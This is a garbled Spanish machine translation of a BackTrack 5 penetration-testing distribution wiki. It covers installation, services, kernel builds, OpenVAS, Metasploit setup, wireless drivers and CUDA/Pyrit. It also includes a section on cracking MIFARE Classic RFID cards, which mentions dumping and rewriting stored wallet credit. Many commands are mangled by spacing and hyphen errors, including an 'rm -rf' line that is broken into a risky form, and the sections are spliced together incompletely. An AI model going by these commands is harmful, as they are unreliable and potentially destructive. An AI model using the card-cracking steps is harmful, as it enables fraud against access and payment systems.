Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Manual Backtrack PDF
Manual Backtrack PDF
Descarga de BackTrack - Instalacin de BackTrack - Instalacin de VMware Tools - Uso bsico - Instalar
VirtualBox
Descarga de
Contenido
[hide]
1 La
descarga
BackTrack
2
Verificaci
n de la
descarga
en Linux
3
Verificaci
n de la
descarga
en
Windows
4
Verificaci
n de la
descarga
en OSX
5 Notas
Importante
s
6 Qu
sucede
despus?
Descarga de BackTrack
Con el lanzamiento de Backtrack 5 que ahora soportan 32 bits, 64 bits y ARM. Backtrack 5 viene con dos
gestores de ventanas principales - Gnome y KDE. Usted puede optar por descargar la pgina ya sea una
imagen VMWare o una imagen ISO de inicio (recomendado si ejecutar Backtrack desde un LiveCD o una
unidad de disco duro / USB). Por favor, use nuestras rplicas oficiales para descargar BackTrack. Estos se
pueden encontrar en la pgina de descarga . No utilice un gestor de descargas con nuestros vnculos como
la descarga es muy probable que se corrompe.
root @ bt: ~ #
Notas Importantes
Los problemas ms comunes encontrados con BackTrack por los recin llegados son:
1. ISO md5sum desajustes, que se traducen en problemas de azar en BackTrack.
2. Medios de comunicacin de baja calidad (en el caso de los DVD), o quemar el archivo ISO a
velocidades que son demasiado altos.
3. Burning BackTrack en un DVD como un archivo en lugar de una imagen de disco.
Por favor, asegrese de comprobar todo lo que era anterior mencionado antes de comenzar un hilo en el
Foro.
Y ahora qu?
El BackTrack 5 imagen ISO es de arranque, lo que significa que usted tendr que o bien quemar el ISO
en un DVD o transferirla a un dispositivo USB. Una vez hecho esto, usted ser capaz de arrancar su
equipo en el entorno BackTrack Live. A partir de este entorno vivo que puede seguir utilizando
BackTrack o instalarlo en su disco duro utilizando una de las guas de instalacin que aparecen en la
pgina de instalacin .
Introduccin
Nota Importante
Por favor recuerde que a pesar de que proporcionan estas guas de instalacin para que usted siga, no
podemos ser responsables de que pierdas tu sistema operativo actualmente instalado / s o datos, ya que no
puede dar cuenta de todas las combinaciones de configuracin que pueda tener.
Tambin tenga en cuenta que tendr que adaptar cualquiera de estas guas para su entorno concreto.
Herramientas y Preparacin
Thumbdrive USB (USB Capacidad de la unidad mnima de 4 GB)
Backtrack 5 archivos ISO, md5sum verificado.
UNetbootin - Una herramienta para transferir una imagen ISO en una unidad USB
UNetbootin permite crear unidades USB de arranque en vivo para Ubuntu, Fedora y otras distribuciones
de Linux sin quemar un CD. Funciona tanto en Windows como Linux. Usted puede dejar que UNetbootin
descargar una de las muchas distribuciones soportadas fuera de la caja para usted, o proporcionar su
propio Linux. Iso si ya ha descargado uno o su distribucin preferida no est en la lista. Este mtodo de
conseguir una instalacin en vivo en una unidad USB es el ms simple disponible utilizando Unetbootin.
Tenga en cuenta que vamos a formatear la unidad USB y borrar su contenido.
Nota: ahora se pueden guardar los cambios realizados en el sistema al reiniciar (persistencia).
Descargue la ltima BackTrack iso de nuestra pgina de descargas BackTrack .
Descargar UNetbootin , la ltima versin (Linux, Windows, OSX)
Una vez reiniciado, recuerde que el nombre de usuario y la contrasea predeterminados son root /
toor.
Persistent USB
Contenido
[hide]
1
Herramient
as
necesarias
y
Preparaci
n
2
particiones
3 Instalar
BackTrack
al
Thumbdriv
e
4 Realice
la unidad
de inicio
5
Configure
Persistenci
a
Herramientas y Preparacin
USB Thumbdrive (Mnimo 8 GB, 16 GB recomendado)
Backtrack 5 ISO archivo md5sum verificada, ni un DVD de arranque BT5
Vmware para arrancar el iso si decide realizar todos los pasos desde el interior de una mquina
virtual como lo hice
No importa la forma que elija, pero tened en cuenta que las designaciones de unidad pueden ser
diferentes para usted de lo que eran para m.
Esto puede no ser la mejor manera de hacer esto, pero funciona. Estoy seguro de que hay una manera ms
elegante de hacer esto que yo pueda volver ms tarde si es necesario y permite tiempo.
Particionamiento
Muestra las unidades disponibles con el comando siguiente y determinar qu unidad que desea instalar.
dmesg | egrep hd \ |. sd.
En este punto, puede que tenga que extraer y volver a insertar el disco para que los cambios de tabla de
particin para ser reconocido y para que usted sea capaz de realizar el resto de los pasos.
Dar formato a las particiones
mkfs.vfat-F 32-n BT5 / dev/sdb1
mkfs.ext3-b 4096-L casper-rw / dev/sdb2
Tenga en cuenta que la segunda particin debe ser etiquetado como casper-rw exactamente como est
escrito aqu, no hay otra etiqueta va a funcionar, ni siquiera si usa tapones en su lugar.
Instalar BackTrack al Thumbdrive
Montar la primera particin que es sdb1 en este ejemplo.
mkdir / mnt/sdb1
mount / dev/sdb1 / mnt/sdb1
Este ltimo paso le tomar un par de minutos para el final, quizs ms, dependiendo de la velocidad de
las unidades de disco y el mtodo que est utilizando.
Esto ha hecho que la unidad de arranque, pero a medida que haya archivos del isolinux con syslinux
sern nombrados incorrectamente y estar en los lugares equivocados. Fcilmente podemos arreglar eso
con los siguientes comandos.
cp-r isolinux syslinux
cp syslinux / isolinux.cfg syslinux / syslinux.cfg
cp syslinux / isolinux.bin syslinux / syslinux.bin
Configurar la persistencia
Para configurar los modos persistentes en las entradas que queremos, tenemos que hacer lo siguiente:
nano syslinux / syslinux.cfg
En mi caso, yo slo quera aadir un nuevo arranque por defecto, que es exactamente la misma que la
Mtodo de instalacin
NOTA: Se recomienda que tenga un mnimo de 20 GB de espacio en disco libre para instalar
Backtrack!
Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.
Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.
Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic
en Siguiente.
Ahora es el momento de particionar el disco, para una instalacin de disco completo que elegir la
opcin "Borrar y utilizar todo el disco" y haga clic en Siguiente.
Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor
contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd.
Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo
basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.
Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.
Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic
en Siguiente.
Ahora es el momento de particionar el disco, para una rpida y exitosa de doble arranque de la
instalacin vamos a elegir la instalarlas al lado del otro, la eleccin entre ellos cada opcin de
inicio y pulse Adelante ..
ADVERTENCIA: El instalador puede parar en ciertos porcentajes, se deja durante unos minutos y
se reanudar.
Pulse el botn Reiniciar ahora y disfrutar de Backtrack!
Uso bsico
Contenido
[hide]
1 Inicio de
sesin en
BackTrack
2 A partir
de un
entorno de
interfaz
grfica de
usuario
3 X no
comenzar
!
4 Red
Llegar al
trabajo
4.1
Co
nfig
ura
ci
n
de
la
IP
ma
nua
lme
nte
4.2
Obt
ene
r
una
dire
cci
n
IP
est
tica
a
peg
arse
entr
e
rein
X no comenzar!
En raras ocasiones (por ejemplo, despus de una instalacin de VMware Tools, o cuando se utilizan
tarjetas de vdeo no compatible), X no se iniciar. Si esto sucede, usted tiene varias opciones que usted
puede intentar para solucionar el problema:
Volver a configurar el paquete del servidor X, se pueden restablecer (y muchas veces arreglarlo)
Xorg configuraciones con el siguiente comando:
root @ bt: ~ # dpkg-reconfigure xserver-xorg
NOTA: A veces, puede que tenga que eliminar tambin las carpetas de cach en / var / tmp ejecutando el
siguiente comando:
root @ bt: ~ # rm-rf / * var/tmp/kdecache-
Configuracin de la IP manualmente
Primero vamos a configurar la red manualmente. En el siguiente ejemplo vamos a suponer las siguientes
direcciones y su finalidad:
Direccin IP - 192.168.1.112/24
Puerta de enlace predeterminada - 192.168.1.1
Servidor DNS - 192.168.1.1
Edite el archivo de segn sea apropiado, continuacin, tiene la de redes hecho para arriba
automticamente en tiempo de boot:
root @ bt: ~ # update-rc.d valores predeterminados de red
root @ bt: ~ # / etc / init.d / networking restart
Al iniciar servicios
BackTrack tiene varios servicios como Apache, SSH, MySQL, VNC, etc Todos ellos estn desactivados
por defecto. Para iniciar un servicio como SSH, puede utilizar los scripts de inicio. Por ejemplo, para
iniciar el servicio SSH:
root @ bt: ~ # sshd-generate # Especfico para el servicio SSH - necesario para generar las
claves SSH
root @ bt: ~ # / etc / init.d / ssh inicio
A partir de OpenBSD Secure Shell servidor: sshd.
root @ bt: ~ # / etc / init.d / ssh stop
Detencin de OpenBSD Secure Shell servidor: sshd.
root @ bt: ~ #
Si utiliza un servidor ssh, por primera vez en Backtrack tendr que generar claves:
root @ bt: ~ # sshd-generate
Para activar un servicio en tiempo de arranque, puede utilizar el comando update-rc.d, por ejemplo,
tener SSH inicie durante el arranque:
root @ bt: ~ # update-rc.d-f ssh por defecto
Adicin de arranque del sistema para / / etc init.d / ssh ...
/ Etc/rc0.d/K20ssh -> .. / init.d / ssh
/ Etc/rc1.d/K20ssh -> .. / init.d / ssh
Otro recurso muy bueno en el uso de comandos de Linux se puede encontrar en linuxcommand.org
Algunos programas no tienen una pgina de manual, pero por lo general puede conseguir ms
informacin sobre su uso, escriba:
root @ bt: ~ # <Nombre Slo el nombre del programa sin ningn arguements.
o
root @ bt: ~ # <Nombre-ayuda
o
root @ bt: ~ # <Nombre - Ayuda
o
root @ bt: ~ # <Nombre-h
Algunos programas utilizan otros mtodos, pero son por lo general slo una variacin de una de las
anteriores cinco comandos.
Ncleo
Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar
en los registros relacionados .
De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como
compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /
NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.
PAE kernel
Despus de haber lanzado las ncurses menuconfig se procede al permitir PAE que se puede
encontrar en las siguientes: Processor type and features -> Soporte de memoria alta (4) -> 64
GB
Una vez que hemos habilitado PAE del menuconfig que avancemos en la construccin de nuestro
ncleo.
root @ bt :/ usr / src / linux # make guiones
root @ bt :/ usr / src / linux # make preparar
Tenemos que reiniciar el sistema y compruebe si PAE est habilitado. (Ajustar la ruta de acceso al
ncleo en ejecucin)
root @ bt: ~ # cat / boot/config-3.2.6 | grep Highmem </ span # CONFIG_HIGHMEM64G no est
configurado CONFIG_HIGHMEM = y
NOTA: Si cambia las opciones adicionales en las ncurses configuracin sin saber cules son las
opciones se podra romper su ncleo!
Habilitacin b43 conductores en BT5 R2 y R3 se requieren recompilar el kernel.
root @ bt: ~ # apt-get dist-upgrade
root @ bt: ~ # preparar-kernel-sources
root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config
root @ bt :/ usr / src / linux # make menuconfig
Configurar el kernel para utilizar B43 en lugar de los controladores predeterminados brcmsmac
seleccionando la opcin de soporte BCMA. Para acceder a esta opcin, vaya a:
Drivers de dispositivos -> Broadcom especfico AMBA.
Agregue el apoyo BCMA como mdulo, y "Apoyo a BCMA en el bus PCI-host" como se muestra
a continuacin
Personalizacin de BackTrack
De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como
compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /
NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.
Instalar Java
Instalar Java
Este artculo fue contribuido por g0tmi1k.
Twitter: ! https://twitter.com/ # / g0tmi1k
NOTA: Antes de instalar Java asegrese de matar Firefox.
root @ bt: ~ # killall -9 / opt / firefox / firefox-bin
Puede descargar Java desde el oficial sitio web . (Descargar versin tar.gz)
En primer lugar, crear el directorio java y lugar all:
root @ bt: ~ # mkdir / opt / java
root @ bt: ~ # mv-f jre1.7.0_05 / / opt / java /
Cambios finales.
root @ bt: ~ # update-alternatives - install / usr / bin / java java / opt/java/jre1.7.0_05/bin/java 1
root @ bt: ~ # update-alternatives - set java / opt/java/jre1.7.0_05/bin/java
Probando el plugin.
root @ bt: ~ # firefox http://java.com/en/download/testjava.jsp
Instalar Fluxbox
Despus de que el script est instalado, veremos que iniciar automticamente la configuracin de
Fluxbox.
Una vez que el guin est terminado se le presentar con un mensaje que le indica que debe
iniciar su Fluxbox.
Sin embargo antes de que reinicie hay una cosa que tenemos que hacer, vamos a tener que hacer
saber a ejecutar BackTrack FluxBox sobre el comando startx y no es por defecto WM.
root @ bt:. ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc
root @ bt: ~ # shutdown-r 0
NOTA: Para volver a la configuracin predeterminada WM todo lo que tienes que hacer es eliminar el
archivo xinitrc..
root @ bt:. ~ # rm-rf ~ / xinitrc
root @ bt: ~ # shutdown-r 0
Despus de quitar flash que necesita para obtener el reproductor de flash de nuevo el oficial [
http://www.adobe.com/software/flash/about/ sitio web]. (Descargar en formato tar.gz)
Lo siguiente que se har cargo del reproductor de Flash:
root @ bt: ~ # mkdir-p ~ / .mozilla / plugins
root @ bt: ~ # mkdir Flash
root @ bt: ~ # mv-f install_flash_player_11_linux.i386.tar.gz flash /
root @ bt: ~ # cd flash /
root @ bt: ~ / flash # tar install_flash_player_11_linux.i386.tar.gz xvfz
root @ bt: ~ / flash # cp-f libflashplayer.so ~ / .mozilla / plugins /
Instale OpenCL
Empecemos:
En primer lugar antes de empezar queremos asegurarnos de que nuestro sistema est actualizado.
root @ bt: ~ # apt-get update && apt-get upgrade
Antes de continuar con la instalacin de los controladores de ATI que necesitamos para que
nuestro cdigo fuente del kernel preparado.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /
Antes de que termine hay una cosa ms que tenemos que instalar, el AMD Accelerated Parallel
Processing (APP) SDK, ste debe ser instalado de acuerdo con la arquitectura de CPU.
Para la arquitectura de 32 bits:
root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz
root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx32.tgz
root @ bt:. ~ # / Install-AMD-APP.sh
Antes de poder instalar cmake + + tenemos que establecer las rutas de ATI Stream:
root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP
root @ bt:. ~ # export ATISTREAMSDKROOT ">> ~ / bashrc
root @ bt:. ~ # source ~ / bashrc
Recopilacin de informacin
Autoscan - Unicornscan
Autoscan
Vamos a configurar rpidamente autoscan en Backtrack5, puede encontrarlo mediante el men en:
BackTrack -> Recopilacin de Informacin -> Anlisis de Red -> Red Scanners -> autoscan
Tan pronto como iniciarlo desde el men comenzaremos nuestro asistente de configuracin, haga
clic en Siguiente para continuar:
Ahora vamos a configurar una nueva red y aadir nuestros propios datos haciendo clic en el
botn Aadir:
Unicornscan
Unicornscan es un impresionante "remitente carga til", que tambin puede actuar como un escner
asncrona. Gracias a dash1b y su guin impresionante parche en marcha, hemos sido capaces de
implementar rpidamente las caractersticas completas del escner en BackTrack 5. Para instalar
unicornscan en BackTrack 5 (si no est ya instalado), escriba:
Pgina
Casa
Foros
Blog
Formacin
Descargas
Sobre
Introduccin>
Kernel>
Personalizacin>
Recopilacin de informacin>
Vulnerabilidad Identificacin>
Explotacin>
Radio Network Analysis>
Privilege Escalation>
Telefona>
Forense>
Errores conocidos BackTrack
Preguntas ms frecuentes
Caja de herramientas
Vulnerabilidad de identificacin
OpenVAS
Contenido
[hide]
1
Instalacin
de
OpenVAS
2
Ubicacin
de las
entradas
del men
OpenVAS
3
OpenVAS
comprobar
la
configuraci
n
4
Configurac
in de
OpenVAS
4.1
Pas
o 1.
A
adir
un
usu
ario
4,2
Pas
o 2.
Hac
er
el
Cer
tific
ado
4.3
Pas
o 3.
La
sinc
roni
zaci
n
Instalacin OpenVAS
La forma ms sencilla de instalar todos los componentes necesarios de la suite openvas es emitir los
mandatos siguientes en una ventana de terminal.
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get install openvas
Los openvas paquete es un "maestro" paquete que contiene toda la informacin necesaria para descargar
automticamente todos los paquetes que componen la suite completa de herramientas de openvas.
Configuracin de OpenVAS
Paso 1. Aadir un usuario
En el men, seleccione OpenVAS Adduser y siga las instrucciones.
Tenga en cuenta que puede utilizar cualquier nombre de usuario que quiera, pero en este caso he usado la
raz. Lo he dejado en el valor predeterminado de autenticacin de contrasea como voy a usar esto en una
mquina local y para evitar tener que preocuparse acerca de los usuarios que tienen certs de qu
preocuparse, pero esto es totalmente de usted. No se puede tener una contrasea vaca, as que he
utilizado Toor en este caso. Para las reglas que se aplican a este usuario he dejado en blanco presionando
ctrl-d Esto significa que este usuario ser capaz de realizar cualquier tarea sin ningn tipo de
restricciones.
Tenga en cuenta el tiempo en la esquina! Esto fue en una mquina virtual de lo que debe ser mucho ms
rpido para usted.
Arranques posteriores ser rpido a menos que no haya actualizado en bastante tiempo
Por favor, recuerde que el escner se ejecuta como un demonio en el fondo y seguir funcionando hasta
que se reinicie o pararlo con la entrada de men proporciona.
ahora tenemos que reconstruir la base de datos, ya que ahora est fuera de fecha con el agregado de nvt y
que de otra manera sera obtener errores sobre la base de datos. Usted debe hacer esto cada vez que
actualice el de NVT. Esto se hace con un simple comando
openvasmd - rebuild
Este proceso slo tomar unos segundos si se utiliza OpenVAS bibliotecas de la versin 4.0.3 o inferior.
Este proceso puede tomar mucho ms tiempo si se utiliza OpenVAS bibliotecas de la versin 4.0.5 o
superior. La desventaja de este tiempo extra es mucho mayor capacidad de exploracin, por lo que vale la
pena.
openvasadmin es el nombre que he elegido para convertirse en el usuario, sin embargo, puede sustituir
eso con algo ms adecuado para usted si as lo desea. Asegrese de que puede recordar este nombre de
usuario y la contrasea asociada, ya que lo necesitar cuando ejecute openvas.
root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin administracin
Palabra clave:
anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: No hay reglas expediente previsto, el
Ms informacin sobre estos comandos y otras opciones se pueden encontrar mediante la ejecucin de su
entrada en el men asociado y mirando las pginas de manual. Como los tres de estos anlisis como un
demonio y seguir funcionando hasta que se cierre su computadora, me han proporcionado las entradas
de men para usted de modo que usted puede detenerlos cuando ya no los necesite.
En este punto de la instalacin es prcticamente completa, pero como hemos llegado hasta aqu bien
podemos seguir para asegurarse de que todo est funcionando como se esperaba.
Inicie esto desde la opcin de men y rellenar las credenciales y los detalles que hemos creado
anteriormente, a continuacin, haga clic en el botn de inicio de sesin.
Una vez conectado usted puede utilizar esto como su interfaz de exploracin, o utilizar la opcin
siguiente de que usted prefiera.
Interfaz web
El siguiente mtodo es a travs de una interfaz web
Abra su navegador favorito y escriba la siguiente direccin
127.0.0.1:9392
A continuacin se le presentar una pgina de inicio de sesin. iniciar sesin con las credenciales que
hemos creado antes.
Una vez que haya iniciado la sesin, se dar cuenta de que su uso de la CPU se golpe el techo, no se
preocupe, este volver a la normalidad en poco tiempo.
Aqu puede realizar y configurar todas las tareas de escaneo. Es una buena idea establecer NoScript para
permitir temporalmente 127.0.0.1 o puede obtener resultados inesperados.
Hay mucho ms para OpenVAS que he incluido aqu, pero esto es slo la intencin de poner en marcha
rpidamente. Analiza y configuraciones ms avanzadas estn ms all del alcance de este tutorial simple.
No se olvide de algunas de las otras partes a openvas contenidos en el men que no he tratado aqu y
tambin las pginas de manual.
Login.
Ahora est listo para configurar tareas de exploracin.
msf>
Vaya por delante y conectarse a la base de datos utilizando la contrasea de root por defecto de MySQL
Toor:
msf> db_driver mysql
[*] El uso de bases de datos mysql conductor
msf> root db_connect: toor@127.0.0.1 / msf3
msf>
Wireless Drivers
Wireless Drivers
Con el escenario siempre cambiante del mundo del controlador inalmbrico y el mac80211 pila, hemos
querido dedicar una pgina que resolver algunas configuraciones complicadas inalmbricos
controladores. Antes de iniciar su viaje hacia BackTrack mundo inalmbrico, primero debe identificar el
chipset de la tarjeta inalmbrica con un 100% de certeza. En caso de duda, usted siempre se puede
intentar de enchufar el tarjeta en una casilla de Linux, y ver lo que dmesg tiene que decir.
Contenido
[hide]
1
BackTrack
5 r2
1.1
b43
2
BackTrack
5 r1
2,1
rt28
00u
sb
3
BackTrack
5
3.1
Wir
eles
s
Dri
ver
s
3
3.2
Tarj
etas
inal
m
bric
as
BackTrack 5 r2
BackTrack 5 R2 contiene imgenes del kernel parcheado 3.2.6 controladores inalmbricos con varios
parches de inyeccin aplicados.
b43
BackTrack 5 R2 ha pasado de b43 conductores a los conductores brcmsmac. Si necesitas habilitar los b43
controladores, siga esta gua - http://www.backtrack-linux.org/wiki/index.php?
title=Enable_b43_drivers_in_Backtrack5_r2 .
BackTrack 5 r1
BackTrack 5 R1 contiene parches del kernel 2.6.39.4 del stock controladores inalmbricos con varios
parches de inyeccin aplicados. Dependiendo de la tarjeta y la configuracin, estos controladores no le
conviene.
rt2800usb
En algunos casos hemos visto las tarjetas que utilizan los controladores rt2800usb (como el
AWUS036NH y Alfs AWUS036NEH) actuar extrao con el kernel BT5R1. Si esto le sucede a usted,
usted puede intentar instalar un reciente compat-wireless y construir por su cuenta. Esta versin
especfica funcionar:
root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build
root @ bt: ~ # cd / usr / src /
root
root
root
root
root
root
root
root
root
root
root
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
BackTrack 5
BackTrack 5 contiene imgenes del kernel 2.6.38 parcheado controladores inalmbricos, as como varios
conductores "externos". Algunos de estos controladores se solapan, para proporcionar una flexibilidad
mxima con varios ataques inalmbricos. El archivo / etc / modprobe.d / blacklist dicta que los
conductores preferidos se cargan al arrancar el sistema. En trminos generales, todos los conductores de
edad avanzada IEEE estn en listas negras y tienen que cargarse manualmente si quieres usarlos.
Wireless Drivers
rtl8187 vs r8187
Esto es confuso. El rtl8187 es el conductor de pila mac80211, mientras que el r8187 es el antiguo
controlador IEEE. Tanto el apoyo de la inyeccin. Los ms nuevos mac80211 RTL8187 conductores
parecen tener un desagradable error en VMWare. Para obtener ms informacin acerca de estos
controladores visite nuestro rtl8187 vs r8187 pgina.
compat wireless
Como Linux controladores inalmbricos maduro, ms chipsets se aaden a la lista de compatibilidad. Si
ninguno de los controladores del ncleo nativo BackTrack trabajar para usted, es posible que desee
considerar el uso de una versin ms reciente de compat-wireless.
Echa un vistazo a la compat-wireless pgina para obtener informacin sobre cmo obtener los drivers y
funcionando.
Tarjetas inalmbricas
ESTA LISTA DEBE SER ACTUALIZADO PARA BT5.
NO tarjetas de trabajo
D-Link DWL-122 - utilizando los drivers mac80211 prism2_usb - fail
Linksys WUSB600N v2 - utilizando los drivers mac80211 rt2800usb - fail
AWUS051NH - fail
Contenido
[hide]
1 RFID
Mifare
Classic
Cocinando
con
2 0x00 Prefacio
2.1
De
pen
den
cias
3 0x01 Hardware
3,1
tou
cha
tag
AC
R1
22
U
4 0x02 Software
4,1
AC
R1
22
U
con
duc
tor
4,2
de
cd
igo
abi
erto
Nea
r
Fiel
d
Co
mm
0x00 - Prlogo
Algunos de ustedes pueden haber ledo que el propio algoritmo simtrico de claves criptogrficas de la
tarjeta MIFARE Classic se ha roto. La tarjeta MIFARE Classic se utiliza en los sistemas de control de
acceso fsico (PACS) y los sistemas de pago sin contacto (incluyendo peaje y sistemas de transporte
pblico). Segn algunas estimaciones, hay 500 millones de tarjetas MIFARE desplegados en todo el
mundo, y la mayora de ellos son las tarjetas MIFARE Classic.
Mifare Classic es un bajo costo, de nivel de entrada chip, basado en la norma ISO / IEC 14443 Tipo A,
1kB o 4KB. Utiliza el estndar de 13,56 Mhz tarjeta inteligente sin contacto, CRYPTO1 propietario con
48 teclas bits. No hay proteccin contra la clonacin o modificaciones. Cualquier persona con 50 lector
puede usar esta debilidad contra su infraestructura. Al menos un sector siempre se cifra con la clave por
defecto. Despus de agrietamiento todas las claves, los hackers son capaces de cambiar el nombre,
nmero de estudiantes universitarios, la fecha de caducidad ... Este libro de cocina es una prueba de
concepto de lo fcil que se puede hacer. Ingredientes elegidos: Backtrack | touchatag paquete inicial
Probado en: BackTrack 4 R2, BackTrack 5 Final, (32 bits)
Dependencias
root @ bt: ~ # apt-get install flex libpcsclite-dev libusb-dev checkinstall
0x01 - Hardware
Touchatag - ACR122U
Touchatag es ACS ACR122 (U) NFC lector RFID USB Reader. El lector USB funciona a 13,56 MHz
(alta frecuencia RFID) y tiene una distancia de lectura de aproximadamente 4 cm (1 pulgada) cuando se
utiliza con las etiquetas RFID touchatag. Este producto est fabricado por Advanced Card Systems
Limited y parece estar disponible en diferentes configuraciones de hardware, pero no difiere mucho.
Todos ellos estn usando un chip NFC PN532 Controller y una unidad ST7 microcontrolador.
0x02 - Software
ACR122U conductor
root @ bt: ~ # wget
http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root @ bt: ~ # unzip-d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root @ bt: ~ # cd acr122u
root @ bt: ~ # tar-jxvf acsccid-1.0.2.tar.bz2
root @ bt: ~ # cd acsccid-1.0.2
root @ bt:. ~ # / configure
root @ bt: ~ # make
root @ bt: ~ # checkinstall-D-y - instalar
Si el lector es rechazada por el firmware (mensaje de registro: "Firmware (xy) es falso") acaba de
desactivar la comprobacin de versin. Todo lo que necesitas hacer es cambiar ifdDriverOptions (lnea 55
en Info.plist) para omitir la comprobacin de versin de esta manera:
root @ bt: ~ # nano / usr / lib / pcsc / drivers / IFD-ccid.bundle / Contenidos / Info.plist
ifdDriverOptions
0 0005
A continuacin, reinicie el demonio pcscd y su lector touchatag deben ser reconocidos y listo.
Tambin puede utilizar el parmetro-k clave, para agregar una clave a la lista de claves conocidas, que
est siendo juzgado en contra de su tarjeta en la fase inicial. La opcin-k de alguna manera no me
funcion, as que siempre compilar mis claves conocidas directamente en Buscar mfoc.c "Matriz de
teclas por defecto Mifare Classic" No estoy seguro acerca de otros pases, pero en el pas donde vivo
teclas son las mismas . Una vez que tenga las llaves de todos los sectores, debe ser capaz de utilizar
RFID-Fu contra otras tarjetas, lo cual es epic fail.
root @ bt: ~ # nfc-mfclassic - ayuda
Uso: nfc-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]
Tenga en cuenta que los UID de la tarjeta no se ver afectada (no cambia) con este proceso. Compre
algunas tarjetas en blanco o III Proxmark si eso es lo que quieres. Si usted est pensando ahora vertido su
monedero electrnico inmediatamente despus de la recarga y cuando el crdito llega a cero, escribir el
contenido de nuevo, por favor, no lo hagas. Qu se puede dejar de hacer eso? Bueno, probablemente
slo su conciencia, pero si la tarjeta se bloquea en 24 horas despus del primer uso y luego no te quejes.
S, hay control en lnea y facturacin de los sistemas que hay para tarjetas bsicas.
0x06 - Conclusin
Por ltimo, cundo la gente a aprender la leccin? Los algoritmos criptogrficos deben ser pblicos para
que puedan ser analizado y probado. Algoritmos secretos no son ms valiosos porque son secretos.
Cualquier persona que necesite una tarjeta inteligente alta seguridad debe asegurarse de que hay
seguridad en capas y no slo depende de la encriptacin del chip.
0x08 - Gracias
Este libro de cocina fue hecha con gran ayuda de los chicos h4f, muchas gracias a Vulcano y Atrs.
0x0A - Acerca de
MI1 es un "entusiasta plena seguridad tiempo" con ttulo universitario en el campo de la informtica.
Recientemente centrando su pasin por cosas USRP y RFID.
Privilege Escalation
CUDA en BackTrack 5
CUDA en BackTrack 5
Esta gua es un trabajo en progreso, y est diseada para ayudar a aquellos que necesitan obtener CUDA
trabajando en sus mquinas inversas.
Comience por la preparacin de sus fuentes del ncleo para la instalacin del controlador Nvidia:
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /
controlador Nvidia.
A continuacin, descargue el kit de herramientas CUDA, de acuerdo con la arquitectura de CPU:
32
64
Lo ideal es instalar el kit de herramientas CUDA en / opt. esta gua se presupone esta ruta de instalacin.
Configurar las variables de entorno para que el comando NVCC funciona. Usted puede hacer esto
aadiendo las siguientes lneas en el archivo / root / .bashrc archivo:
PATH = $ PATH :/ opt / cuda / bin
LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib
export PATH
export LD_LIBRARY_PATH
A continuacin, ejecute:
root @ bt: ~ # source / root / .bashrc
root @ bt: ~ # ldconfig
El propsito de esto era conseguir compilador NVCC instalado. Usted puede comprobar que todo est
configurado correctamente:
root @ bt: ~ # que NVCC
/ Opt / cuda / bin / NVCC
root @ bt: ~ # NVCC-V
NVCC: NVIDIA (R) Cuda conductor compilador
Copyright (c) 2005-2011 NVIDIA Corporation
Construido sobre Sun_Mar_20_16: 45:27 _PDT_2011
Cuda herramientas de compilacin, versin 4.0, V0.2.1221
root @ bt: ~ #
Ahora que el controlador de Nvidia CUDA y kit de herramientas se instalan, podemos probar su
funcionalidad con una herramienta GPU potencia, como Pyrit.
root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ Pyrit
root @ bt: ~ # cd Pyrit / Pyrit && python setup.py construir && python setup.py install
root @ bt: ~ # cd .. / .. /
root @ bt: ~ # cd Pyrit / cpyrit_cuda && python setup.py construir && python setup.py install
Ejecutar un punto de referencia para ver que todo funciona como se espera:
root @ bt: ~ # Pyrit punto de referencia
Pyrit 0.4.1-dev (svn R308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
Este cdigo se distribuye bajo la v3 Licencia Pblica General GNU +
Punto de referencia en funcionamiento (63.787,8 PMKs / s) ... \
Computarizada 63.787,82 PMKs / s total.
# 1: 'CUDA-Device # 1' GeForce GTX 295: 11558.7 PMKs / s (RTT 3,0)
